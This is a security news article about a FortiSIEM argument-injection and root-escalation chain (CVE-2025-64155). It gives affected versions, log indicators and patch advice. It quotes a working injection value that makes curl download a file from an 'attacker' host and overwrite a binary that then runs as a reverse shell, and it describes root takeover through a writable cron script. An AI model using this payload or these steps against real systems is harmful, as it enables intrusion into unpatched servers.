Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
FCC Bans Chinese Telecom Equipment From Huawei, ZTE, Others Over Security Risks
July 2, 2026
Critical JetBrains Flaws Allow Auth Bypass, Code Execution
July 2, 2026
Critical Microsoft Defender, Sysmon Flaw Lets Attackers Disable Security
July 2, 2026
Home/CyberSecurity News/Critical FortiSIEM Vulnerability(CVE-2025-64155) Enable Full RCE and Root Compromise
CyberSecurity News

Critical FortiSIEM Vulnerability(CVE-2025-64155) Enable Full RCE and Root Compromise

Fortinet issued an advisory in August 2025 for CVE-2025-25256, an OS command injection vulnerability (CWE-78) affecting FortiSIEM. This flaw exposed the platform to unauthenticated remote code...

Marcus Rodriguez
Marcus Rodriguez
January 14, 2026 2 Min Read
28 0

Fortinet issued an advisory in August 2025 for CVE-2025-25256, an OS command injection vulnerability (CWE-78) affecting FortiSIEM. This flaw exposed the platform to unauthenticated remote code execution through crafted CLI requests.

Practical exploits surfaced in the wild, prompting security firm Horizon3.ai to conduct a deep investigation. Their analysis uncovered a devastating chain: an unauthenticated argument injection vulnerability enabling arbitrary file writes and RCE as the admin user, paired with a file overwrite privilege escalation to root access.

Fortinet assigned these CVE-2025-64155 under FG-IR-25-772. A proof-of-concept exploit is available on GitHub.

This marks another chapter in FortiSIEM’s vulnerability saga for Horizon3.ai researchers, who have dissected the platform for years. Prior disclosures include CVE-2023-34992 (phMonitor command injection) and CVE-2024-23108 (second-order injection), detailed in their deep dives.

Although not listed in CISA’s Known Exploited Vulnerabilities catalog, leaked Black Basta ransomware chats from earlier in 2025 referenced these flaws, indicating threat actor interest.

FortiSIEM Architecture and phMonitor Exposure

FortiSIEM supports varied deployments: all-in-one servers or supervisor-collector models, where the phMonitor service handles inter-role communication over TCP/IP port 7900.

This service processes custom API messages without authentication, mapping commands to handlers via integers in phMonitorProcess::initEventHandler. Past hardening reduced exposure, but vulnerabilities persist.

CVE-2025-64155 targets handleStorageRequest with “elastic” storage type. User-controlled XML tags like cluster_name and cluster_url feed into /opt/phoenix/phscripts/bin/elastic_test_url.sh.

Despite subprocess.run() wrappers and wrapShellToken escaping, the script’s curl invocation via execve allows argument injection.

By leveraging curl’s obscure –next flag, attackers chain requests: <cluster_url>http://attacker:9200 –next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url>.

This overwrites phLicenseTool executed every few seconds as a reverse shell, yielding admin access.

Version Affected Solution
7.4 Not affected N/A
7.3 7.3.0-7.3.1 Upgrade to 7.3.2+
7.2 7.2.0-7.2.5 Upgrade to 7.2.6+
7.1 7.1.0-7.1.7 Upgrade to 7.1.8+
7.0 7.0.0-7.0.3 Upgrade to 7.0.4+
6.7 6.7.0-6.7.9 Upgrade to 6.7.10+
6.6 and below All versions Migrate to fixed release

Admin shells pave the way to root via cronjob abuse. The root crontab /etc/cron.d/fsm-crontab runs /opt/charting/redishb.sh every minute, writable by admin despite root execution. Overwriting it with a payload grants full compromise.

Indicators of Compromise

Monitor /opt/phoenix/log/phoenix.logs for PHL_ERROR entries logging elastic_test_url.sh abuse, including malicious URLs and target files (e.g., phLicenseTool overwrites).

Fortinet urges upgrades and port 7900 restrictions. Organizations should audit logs and patch immediately amid rising SIEM targeting.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVEExploitPatchransomwareSecurityThreatVulnerability

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

LLMs are Accelerating the Ransomware Lifecycle to Gain Speed, Volume, and Multilingual Reach

Next Post

North Korean Hackers use Code Abuse Tactics for ‘Contagious Interview’ Campaign

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
WinRAR 7.23 Patches Critical Heap Overflow Vulnerability CVE-2024-XXXX
July 2, 2026
Medtronic Confirms Data Breach, Corporate IT Systems Compromised
July 2, 2026
Critical ClamAV Vulnerabilities Let Attackers Trigger DoS
July 2, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us